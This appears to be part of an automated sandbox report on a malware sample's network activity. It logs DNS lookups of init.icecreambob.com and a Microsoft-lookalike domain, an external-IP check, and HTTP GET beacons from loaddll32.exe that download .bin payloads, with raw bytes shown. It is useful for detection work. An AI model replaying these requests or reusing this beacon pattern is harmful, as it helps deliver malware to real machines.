                                                          Oct 7, 2021 01:32:18.762942076 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.762967110 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.762984991 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.763025999 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.763166904 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.763215065 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.763231993 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.763262033 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.763302088 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.763339043 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.763367891 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.763390064 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.763406038 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.763416052 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.763453007 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.763494968 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.763516903 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.763617039 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.803900957 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.803955078 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.803992987 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.804039001 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.804083109 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.804105997 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.804121017 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.804163933 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.804178953 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.814856052 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.814912081 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.814981937 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815020084 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815058947 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815095901 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815103054 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.815177917 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815203905 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.815213919 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.815237045 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815288067 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815329075 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.815350056 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815393925 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815401077 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.815431118 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815469980 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815483093 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.815506935 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815543890 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815584898 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815602064 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.815624952 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815639019 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.815673113 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815713882 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815751076 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815790892 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815819979 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.815829992 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815835953 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.815865993 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815881014 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.815906048 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815943956 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815992117 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815996885 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.816034079 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.816041946 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.816071987 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.816119909 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.855792999 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.855822086 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.855834961 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.855851889 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.855871916 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.855892897 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.855914116 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.855935097 CEST8049776194.147.86.221192.168.2.4

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Oct 7, 2021 01:32:17.880515099 CEST4971453192.168.2.48.8.8.8
                                                          Oct 7, 2021 01:32:18.173275948 CEST53497148.8.8.8192.168.2.4
                                                          Oct 7, 2021 01:32:18.824342966 CEST5802853192.168.2.48.8.8.8
                                                          Oct 7, 2021 01:32:18.980140924 CEST5309753192.168.2.48.8.8.8
                                                          Oct 7, 2021 01:32:19.161839008 CEST53580288.8.8.8192.168.2.4
                                                          Oct 7, 2021 01:32:19.289130926 CEST53530978.8.8.8192.168.2.4
                                                          Oct 7, 2021 01:32:20.480238914 CEST4925753192.168.2.48.8.8.8
                                                          Oct 7, 2021 01:32:20.772708893 CEST53492578.8.8.8192.168.2.4
                                                          Oct 7, 2021 01:32:20.812315941 CEST6238953192.168.2.48.8.8.8
                                                          Oct 7, 2021 01:32:20.830039024 CEST53623898.8.8.8192.168.2.4
                                                          Oct 7, 2021 01:32:23.312601089 CEST4991053192.168.2.48.8.8.8
                                                          Oct 7, 2021 01:32:23.618545055 CEST53499108.8.8.8192.168.2.4
                                                          Oct 7, 2021 01:33:24.333306074 CEST6407853192.168.2.48.8.8.8
                                                          Oct 7, 2021 01:33:24.352554083 CEST53640788.8.8.8192.168.2.4
                                                          Oct 7, 2021 01:33:24.362245083 CEST6407953192.168.2.4208.67.222.222
                                                          Oct 7, 2021 01:33:24.379193068 CEST5364079208.67.222.222192.168.2.4
                                                          Oct 7, 2021 01:33:24.381411076 CEST6408053192.168.2.4208.67.222.222
                                                          Oct 7, 2021 01:33:24.399873972 CEST5364080208.67.222.222192.168.2.4
                                                          Oct 7, 2021 01:33:24.429609060 CEST6408153192.168.2.4208.67.222.222
                                                          Oct 7, 2021 01:33:24.448523998 CEST5364081208.67.222.222192.168.2.4
                                                          Oct 7, 2021 01:34:00.486257076 CEST5125553192.168.2.48.8.8.8
                                                          Oct 7, 2021 01:34:00.780658960 CEST53512558.8.8.8192.168.2.4
                                                          Oct 7, 2021 01:34:09.717750072 CEST6152253192.168.2.48.8.8.8
                                                          Oct 7, 2021 01:34:10.070925951 CEST53615228.8.8.8192.168.2.4

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                          Oct 7, 2021 01:32:17.880515099 CEST192.168.2.48.8.8.80x2a0eStandard query (0)init.icecreambob.comA (IP address)IN (0x0001)
                                                          Oct 7, 2021 01:32:18.824342966 CEST192.168.2.48.8.8.80x4731Standard query (0)init.icecreambob.comA (IP address)IN (0x0001)
                                                          Oct 7, 2021 01:32:18.980140924 CEST192.168.2.48.8.8.80xa7a5Standard query (0)init.icecreambob.comA (IP address)IN (0x0001)
                                                          Oct 7, 2021 01:32:20.480238914 CEST192.168.2.48.8.8.80x46cbStandard query (0)init.icecreambob.comA (IP address)IN (0x0001)
                                                          Oct 7, 2021 01:32:20.812315941 CEST192.168.2.48.8.8.80x2650Standard query (0)init.icecreambob.comA (IP address)IN (0x0001)
                                                          Oct 7, 2021 01:32:23.312601089 CEST192.168.2.48.8.8.80x5791Standard query (0)init.icecreambob.comA (IP address)IN (0x0001)
                                                          Oct 7, 2021 01:33:24.333306074 CEST192.168.2.48.8.8.80xb091Standard query (0)resolver1.opendns.comA (IP address)IN (0x0001)
                                                          Oct 7, 2021 01:33:24.362245083 CEST192.168.2.4208.67.222.2220x1Standard query (0)222.222.67.208.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                                          Oct 7, 2021 01:33:24.381411076 CEST192.168.2.4208.67.222.2220x2Standard query (0)myip.opendns.comA (IP address)IN (0x0001)
                                                          Oct 7, 2021 01:33:24.429609060 CEST192.168.2.4208.67.222.2220x3Standard query (0)myip.opendns.com28IN (0x0001)
                                                          Oct 7, 2021 01:34:00.486257076 CEST192.168.2.48.8.8.80x70a8Standard query (0)art.microsoftsofymicrosoftsoft.atA (IP address)IN (0x0001)
                                                          Oct 7, 2021 01:34:09.717750072 CEST192.168.2.48.8.8.80x75bStandard query (0)art.microsoftsofymicrosoftsoft.atA (IP address)IN (0x0001)

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                          Oct 7, 2021 01:32:18.173275948 CEST8.8.8.8192.168.2.40x2a0eNo error (0)init.icecreambob.com194.147.86.221A (IP address)IN (0x0001)
                                                          Oct 7, 2021 01:32:19.161839008 CEST8.8.8.8192.168.2.40x4731No error (0)init.icecreambob.com194.147.86.221A (IP address)IN (0x0001)
                                                          Oct 7, 2021 01:32:19.289130926 CEST8.8.8.8192.168.2.40xa7a5No error (0)init.icecreambob.com194.147.86.221A (IP address)IN (0x0001)
                                                          Oct 7, 2021 01:32:20.772708893 CEST8.8.8.8192.168.2.40x46cbNo error (0)init.icecreambob.com194.147.86.221A (IP address)IN (0x0001)
                                                          Oct 7, 2021 01:32:20.830039024 CEST8.8.8.8192.168.2.40x2650No error (0)init.icecreambob.com194.147.86.221A (IP address)IN (0x0001)
                                                          Oct 7, 2021 01:32:23.618545055 CEST8.8.8.8192.168.2.40x5791No error (0)init.icecreambob.com194.147.86.221A (IP address)IN (0x0001)
                                                          Oct 7, 2021 01:33:24.352554083 CEST8.8.8.8192.168.2.40xb091No error (0)resolver1.opendns.com208.67.222.222A (IP address)IN (0x0001)
                                                          Oct 7, 2021 01:33:24.379193068 CEST208.67.222.222192.168.2.40x1No error (0)222.222.67.208.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                                          Oct 7, 2021 01:33:24.379193068 CEST208.67.222.222192.168.2.40x1No error (0)222.222.67.208.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                                          Oct 7, 2021 01:33:24.379193068 CEST208.67.222.222192.168.2.40x1No error (0)222.222.67.208.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                                          Oct 7, 2021 01:33:24.399873972 CEST208.67.222.222192.168.2.40x2No error (0)myip.opendns.com102.129.143.57A (IP address)IN (0x0001)
                                                          Oct 7, 2021 01:34:00.780658960 CEST8.8.8.8192.168.2.40x70a8No error (0)art.microsoftsofymicrosoftsoft.at194.147.86.221A (IP address)IN (0x0001)
                                                          Oct 7, 2021 01:34:10.070925951 CEST8.8.8.8192.168.2.40x75bNo error (0)art.microsoftsofymicrosoftsoft.at194.147.86.221A (IP address)IN (0x0001)

                                                          HTTP Request Dependency Graph

                                                          • init.icecreambob.com
                                                          • art.microsoftsofymicrosoftsoft.at

                                                          HTTP Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          0192.168.2.449776194.147.86.22180C:\Windows\System32\loaddll32.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Oct 7, 2021 01:32:18.233037949 CEST1596OUTGET /HKPpcwlwrfQkTmv8P06H/3Wxv_2FnSDQGUBdPXw9/RYY8q690tWMw7_2FqiZKDR/tihJyHYSdUWc_/2Bk0Blz4/Ugw940qxXbfuHBW4kjFJy7m/qeLyDgVQe2/v1ANC_2B2jNzm_2B0/UCUkcrNLM1Qj/GKGs5Yns4a1/y2RcxBlEBBMDgc/vui4nnWlDWEvxcnjXpxFk/PDKIsTs7GBXCyaSr/TwT_2BF1pJMPI8c/ynG0YGZIeokgeQwjHf/KZMBUT4_2/BvirsVJDlpOpDnwD83YS/kQDSJlsGXWqTNVyxDqs/KuldZQ_2BlbTtmbV3TyeLX/ai8Q6i HTTP/1.1
                                                          Cache-Control: no-cache
                                                          Connection: Keep-Alive
                                                          Pragma: no-cache
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0
                                                          Host: init.icecreambob.com
                                                          Oct 7, 2021 01:32:18.712804079 CEST1597INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Wed, 06 Oct 2021 23:32:18 GMT
                                                          Content-Type: application/octet-stream
                                                          Content-Length: 194704
                                                          Connection: close
                                                          Pragma: public
                                                          Accept-Ranges: bytes
                                                          Expires: 0
                                                          Cache-Control: must-revalidate, post-check=0, pre-check=0
                                                          Content-Disposition: inline; filename="615e3202a5f19.bin"
                                                          Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                          X-Content-Type-Options: nosniff
                                                          Data Raw: 94 88 7c 25 28 17 00 c4 63 f0 06 1c 3b e8 95 8b ba be e6 78 80 40 2e e8 92 09 78 d3 be bf 0b c7 98 ce 6c 02 f6 4f 2e dc a2 6d 17 4b 99 a2 72 cd dd 48 40 a0 0b 9a b0 3a 13 31 02 61 ed b5 a2 45 3d ba c7 d3 54 37 ae 50 dc 54 cd e7 31 c8 4e e2 86 81 0f a8 fa cf 3d af 72 64 2b cd 53 7d f5 d8 85 3a 44 bf 3e 5e 42 6e c2 f2 01 42 39 1a d0 bd e1 e9 4f cf 0d 6f 1a 5c a4 1f 4d 9e 53 3e f8 8a 9d cb 39 8d c1 3e 52 69 02 36 3a 44 9d 07 e7 3f 42 be ec ef f3 98 15 c8 c5 96 9b ca 42 8f be 41 63 c7 58 d6 bf 48 8e 37 c9 0e 31 a5 ad 55 88 7f 1f 4d 43 36 cd b2 3b 1d a7 b0 9f 1b 4e 5c 65 cc 08 e7 c8 bb 20 d4 9b d3 71 46 b3 b8 ea 19 bf a8 f9 86 4c 1c c9 50 f2 97 52 05 e3 9f e2 25 ba 6b 79 9c 28 a0 88 a8 7d 98 8e 17 05 15 9b 76 e3 5d 62 bd 23 46 7d 36 b2 2b eb 02 f7 49 61 7a b7 10 12 10 45 37 23 db 1e 93 72 f1 d6 e1 16 db e1 e9 73 7f 36 32 66 95 83 c8 6e c4 95 7f 2f 57 99 17 97 83 9d 5f 8d 11 be 55 1f be 0c 6b 62 5c 8e 1d 82 68 e5 24 0a d8 de b4 d1 05 43 97 7e aa 01 75 71 59 f3 bf b5 d5 f1 22 de 50 ae 78 af a3 3b ea d2 9d cd 20 b2 6c 68 02 cd 8e 8e 51 47 35 a7 5f c7 6d cf f1 34 be 2f 32 1b c7 26 4a a8 9b 71 d5 cc 17 09 71 c6 48 13 49 03 5a 6c 17 f9 84 e7 ac 7a 57 d3 a3 e9 62 46 b9 48 98 0b 48 15 4f d5 46 84 85 04 c2 4a 78 8b 9a a2 82 9b 2f ae f9 94 9d 58 12 50 de a6 9b 3f 4b 5c 47 3c 89 3f 88 90 6f 86 cc 7b b7 2c cc 35 1a 93 cd 47 d9 5f c9 47 52 d7 ad 08 58 e1 3c 18 0e 57 57 ad 86 75 dc 57 21 e5 d1 ed b8 3c 0b f5 dc 12 32 51 d3 fa 26 66 da 8f 2e 6f 6c d5 43 99 bb 4b cd dd 54 88 32 84 fe 8f 85 3e f8 c8 17 96 1d c5 9a f0 69 19 ea 45 d7 cd 04 cd 6e 2f a7 d0 0c 60 9b 0a 6d 1b 7b 10 2c 53 49 2d 30 d6 e4 d8 bb 37 76 98 f2 6b 69 eb 4b ae 30 ee 00 bb 11 5c a4 3b e7 c1 b1 24 42 71 14 e5 1e 7f 8e 28 9e 3d c1 9e 14 9b 12 ea d7 93 56 67 ea 7c 39 f5 e2 b9 b9 ff fe 69 fc ef ac 34 41 bf 08 66 e5 4c 55 0d f0 f2 fa 78 90 ba 34 ff a6 b8 b8 03 61 e3 b2 67 63 aa 38 1d b9 7f 96 f6 7a 58 2e 4c 2b 63 59 e6 6a 79 54 5b d5 2f 60 29 49 fd ec 82 4d 61 bf a5 e6 c3 94 cf d5 1c 92 a5 8b d9 e9 3b b0 63 96 87 b3 84 24 9b 07 2b 43 5f 80 26 bc 42 6b 06 5b 19 d6 4c 11 48 9d 39 ea fa 0f 64 ee eb 8b a7 e2 4c 37 3c 0b c7 86 77 eb f8 29 da 5a 8f 41 e2 7b d4 dc 06 46 06 07 90 95 42 13 3f 3e a1 ee 2c 2f 5e 72 95 3f f2 09 e8 3e 9f 6e a6 61 99 b8 02 37 06 9a 3f 66 24 9b be aa 4e eb fd 55 db da 85 6d ed e3 6c 76 2a be 75 34 7d 58 83 2b 1e 8e 5a 11 83 fe 95 24 24 cb a1 07 54 a2 0e 30 bf cb 7c 9b 69 8a d8 2e 91 74 d6 02 d2 af 1c a7 bb 62 76 23 4c f7 72 f2 83 01 f7 5a 5c 06 4f 1c 6f 6f 4c 5e eb 94 20 2f ba 65 96 0e 8f 0d 93 4b 30 04 4c 2e 13 97 a2 93 4e dd 4d 35 97 fc eb ec 3e 45 d3 36 0a 36 2f 8f d6 d3 49 fa 77 2e 82 45 51 d3 c2 bc f0 41 93 36 eb a3 09 65 31 62 82 66 34 31 ce 34 99 99 f3 0c 1a e2 26 f6 f3 f8 df 7e b3 85 2e 58 88 8c d0 69 33 c3 dd ce 14 92 1b 8e 6f 0e 5a 90 fc
                                                          Data Ascii: |%(c;x@.xlO.mKrH@:1aE=T7PT1N=rd+S}:D>^BnB9Oo\MS>9>Ri6:D?BBAcXH71UMC6;N\e qFLPR%ky(}v]b#F}6+IazE7#rs62fn/W_Ukb\h$C~uqY"Px; lhQG5_m4/2&JqqHIZlzWbFHHOFJx/XP?K\G<?o{,5G_GRX<WWuW!<2Q&f.olCKT2>iEn/`m{,SI-07vkiK0\;$Bq(=Vg|9i4AfLUx4agc8zX.L+cYjyT[/`)IMa;c$+C_&Bk[LH9dL7<w)ZA{FB?>,/^r?>na7?f$NUmlv*u4}X+Z$$T0|i.tbv#LrZ\OooL^ /eK0L.NM5>E66/Iw.EQA6e1bf414&~.Xi3oZ


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          1192.168.2.449777194.147.86.22180C:\Windows\System32\loaddll32.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Oct 7, 2021 01:32:19.242465973 CEST1800OUTGET /FcQup_2BTAzx5PF2I3Tn/YlRrkU5iinU1xuRm5TK/CmVp_2BlzVsGcnrzGccrm7/ksEs9ImmPr12_/2Bzh4tdV/KDpXfYGpjXykhg2xrNZQnLl/eQWxO9UJs6/yiNSkrLwUALCzuZwZ/kdGCEU3rIU9m/RGyuFMKeogE/z1UGBluOo2rYqx/Sf1vojdcef_2FoAlYSwrS/eWFw3oSweCgrgQTo/R3sh0ZaR7_2BXrU/KBuwJkO2cZWh9s5jos/PpUP1bcud/5c_2B9g4iz3DCS_2B4Cz/pQllr8YcQ_2FVn4H2Us/rP5gQf2cVzgDcEADA7kdUN/KefPCJRSUE50z/YwbIZJdHqw/X0ic HTTP/1.1
                                                          Cache-Control: no-cache
                                                          Connection: Keep-Alive
                                                          Pragma: no-cache
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0
                                                          Host: init.icecreambob.com
                                                          Oct 7, 2021 01:32:19.686741114 CEST1802INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Wed, 06 Oct 2021 23:32:19 GMT
                                                          Content-Type: application/octet-stream
                                                          Content-Length: 194704
                                                          Connection: close
                                                          Pragma: public
                                                          Accept-Ranges: bytes
                                                          Expires: 0
                                                          Cache-Control: must-revalidate, post-check=0, pre-check=0
                                                          Content-Disposition: inline; filename="615e3203a062c.bin"
                                                          Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                          X-Content-Type-Options: nosniff
                                                          Data Raw: 94 88 7c 25 28 17 00 c4 63 f0 06 1c 3b e8 95 8b ba be e6 78 80 40 2e e8 92 09 78 d3 be bf 0b c7 98 ce 6c 02 f6 4f 2e dc a2 6d 17 4b 99 a2 72 cd dd 48 40 a0 0b 9a b0 3a 13 31 02 61 ed b5 a2 45 3d ba c7 d3 54 37 ae 50 dc 54 cd e7 31 c8 4e e2 86 81 0f a8 fa cf 3d af 72 64 2b cd 53 7d f5 d8 85 3a 44 bf 3e 5e 42 6e c2 f2 01 42 39 1a d0 bd e1 e9 4f cf 0d 6f 1a 5c a4 1f 4d 9e 53 3e f8 8a 9d cb 39 8d c1 3e 52 69 02 36 3a 44 9d 07 e7 3f 42 be ec ef f3 98 15 c8 c5 96 9b ca 42 8f be 41 63 c7 58 d6 bf 48 8e 37 c9 0e 31 a5 ad 55 88 7f 1f 4d 43 36 cd b2 3b 1d a7 b0 9f 1b 4e 5c 65 cc 08 e7 c8 bb 20 d4 9b d3 71 46 b3 b8 ea 19 bf a8 f9 86 4c 1c c9 50 f2 97 52 05 e3 9f e2 25 ba 6b 79 9c 28 a0 88 a8 7d 98 8e 17 05 15 9b 76 e3 5d 62 bd 23 46 7d 36 b2 2b eb 02 f7 49 61 7a b7 10 12 10 45 37 23 db 1e 93 72 f1 d6 e1 16 db e1 e9 73 7f 36 32 66 95 83 c8 6e c4 95 7f 2f 57 99 17 97 83 9d 5f 8d 11 be 55 1f be 0c 6b 62 5c 8e 1d 82 68 e5 24 0a d8 de b4 d1 05 43 97 7e aa 01 75 71 59 f3 bf b5 d5 f1 22 de 50 ae 78 af a3 3b ea d2 9d cd 20 b2 6c 68 02 cd 8e 8e 51 47 35 a7 5f c7 6d cf f1 34 be 2f 32 1b c7 26 4a a8 9b 71 d5 cc 17 09 71 c6 48 13 49 03 5a 6c 17 f9 84 e7 ac 7a 57 d3 a3 e9 62 46 b9 48 98 0b 48 15 4f d5 46 84 85 04 c2 4a 78 8b 9a a2 82 9b 2f ae f9 94 9d 58 12 50 de a6 9b 3f 4b 5c 47 3c 89 3f 88 90 6f 86 cc 7b b7 2c cc 35 1a 93 cd 47 d9 5f c9 47 52 d7 ad 08 58 e1 3c 18 0e 57 57 ad 86 75 dc 57 21 e5 d1 ed b8 3c 0b f5 dc 12 32 51 d3 fa 26 66 da 8f 2e 6f 6c d5 43 99 bb 4b cd dd 54 88 32 84 fe 8f 85 3e f8 c8 17 96 1d c5 9a f0 69 19 ea 45 d7 cd 04 cd 6e 2f a7 d0 0c 60 9b 0a 6d 1b 7b 10 2c 53 49 2d 30 d6 e4 d8 bb 37 76 98 f2 6b 69 eb 4b ae 30 ee 00 bb 11 5c a4 3b e7 c1 b1 24 42 71 14 e5 1e 7f 8e 28 9e 3d c1 9e 14 9b 12 ea d7 93 56 67 ea 7c 39 f5 e2 b9 b9 ff fe 69 fc ef ac 34 41 bf 08 66 e5 4c 55 0d f0 f2 fa 78 90 ba 34 ff a6 b8 b8 03 61 e3 b2 67 63 aa 38 1d b9 7f 96 f6 7a 58 2e 4c 2b 63 59 e6 6a 79 54 5b d5 2f 60 29 49 fd ec 82 4d 61 bf a5 e6 c3 94 cf d5 1c 92 a5 8b d9 e9 3b b0 63 96 87 b3 84 24 9b 07 2b 43 5f 80 26 bc 42 6b 06 5b 19 d6 4c 11 48 9d 39 ea fa 0f 64 ee eb 8b a7 e2 4c 37 3c 0b c7 86 77 eb f8 29 da 5a 8f 41 e2 7b d4 dc 06 46 06 07 90 95 42 13 3f 3e a1 ee 2c 2f 5e 72 95 3f f2 09 e8 3e 9f 6e a6 61 99 b8 02 37 06 9a 3f 66 24 9b be aa 4e eb fd 55 db da 85 6d ed e3 6c 76 2a be 75 34 7d 58 83 2b 1e 8e 5a 11 83 fe 95 24 24 cb a1 07 54 a2 0e 30 bf cb 7c 9b 69 8a d8 2e 91 74 d6 02 d2 af 1c a7 bb 62 76 23 4c f7 72 f2 83 01 f7 5a 5c 06 4f 1c 6f 6f 4c 5e eb 94 20 2f ba 65 96 0e 8f 0d 93 4b 30 04 4c 2e 13 97 a2 93 4e dd 4d 35 97 fc eb ec 3e 45 d3 36 0a 36 2f 8f d6 d3 49 fa 77 2e 82 45 51 d3 c2 bc f0 41 93 36 eb a3 09 65 31 62 82 66 34 31 ce 34 99 99 f3 0c 1a e2 26 f6 f3 f8 df 7e b3 85 2e 58 88 8c d0 69 33 c3 dd ce 14 92 1b 8e 6f 0e 5a 90 fc
                                                          Data Ascii: |%(c;x@.xlO.mKrH@:1aE=T7PT1N=rd+S}:D>^BnB9Oo\MS>9>Ri6:D?BBAcXH71UMC6;N\e qFLPR%ky(}v]b#F}6+IazE7#rs62fn/W_Ukb\h$C~uqY"Px; lhQG5_m4/2&JqqHIZlzWbFHHOFJx/XP?K\G<?o{,5G_GRX<WWuW!<2Q&f.olCKT2>iEn/`m{,SI-07vkiK0\;$Bq(=Vg|9i4AfLUx4agc8zX.L+cYjyT[/`)IMa;c$+C_&Bk[LH9dL7<w)ZA{FB?>,/^r?>na7?f$NUmlv*u4}X+Z$$T0|i.tbv#LrZ\OooL^ /eK0L.NM5>E66/Iw.EQA6e1bf414&~.Xi3oZ


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          2192.168.2.449778194.147.86.22180C:\Windows\System32\loaddll32.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Oct 7, 2021 01:32:19.340179920 CEST1801OUTGET /og7BnMlwe_2BBL3VbbSex/Z2wNM4qLt9ZGOnrN/9je8jFPaDsbcMzh/J_2BWsBwN0E9DyNOrX/d2qP1bGCk/qJX6O5QV7cikPdeCysOT/SVA8NuODHqgxyywc97o/sy0RL7jVfhXgOS_2F71qSG/2FS97AOq0AZ7i/X9_2BsM8/SJH1OhdjW9LhTsNZM3lXLoj/SkVBjHPOLQ/6GYRgOB9uQP3Kv3KV/fG6AntXu_2Fz/nGnOrkp86kX/RqEbx2FTMLsnk_/2FwjN_2B5_2BN0BKA_2FD/vDq8sU2vs2Ajys3z/1dncEwDhZBm_2B_/2BT0IVCl_2Fi1ROltK/Ns3vDVNy1/kniVonoTwHdN/F4BE_2B HTTP/1.1
                                                          Cache-Control: no-cache
                                                          Connection: Keep-Alive
                                                          Pragma: no-cache
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0
                                                          Host: init.icecreambob.com
                                                          Oct 7, 2021 01:32:19.811055899 CEST1894INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Wed, 06 Oct 2021 23:32:19 GMT
                                                          Content-Type: application/octet-stream
                                                          Content-Length: 247962
                                                          Connection: close
                                                          Pragma: public
                                                          Accept-Ranges: bytes
                                                          Expires: 0
                                                          Cache-Control: must-revalidate, post-check=0, pre-check=0
                                                          Content-Disposition: inline; filename="615e3203bb666.bin"
                                                          Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                          X-Content-Type-Options: nosniff
